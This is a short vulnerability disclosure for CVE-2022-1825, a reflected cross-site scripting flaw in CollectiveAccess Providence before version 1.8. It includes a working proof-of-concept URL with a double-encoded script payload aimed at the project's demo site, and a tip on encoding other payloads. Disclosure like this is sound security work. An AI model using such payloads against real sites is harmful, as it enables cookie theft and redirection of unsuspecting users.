Headline
CVE-2022-1825: Reflected XSS in providence
Cross-site Scripting (XSS) - Reflected in GitHub repository collectiveaccess/providence prior to 1.8.
Description
Hello , i found an authenticated reflected xss via path fragment this was exploitable through trusting user input in url path fragement , please note : if you wrote a different payload you need to URL Encode the payload twice
Proof of Concept
Enter this url : https://demo.collectiveaccess.org/index.php/system/Error/Show/n/3250%22%253CScRiPt%2520%253Ealert(%221337%22)%253C%252FsCripT%253E
Picture:
Kind Regards,
Rawi (@0xRaw)
Impact
Steal User Cookies or redirect user to malicious sites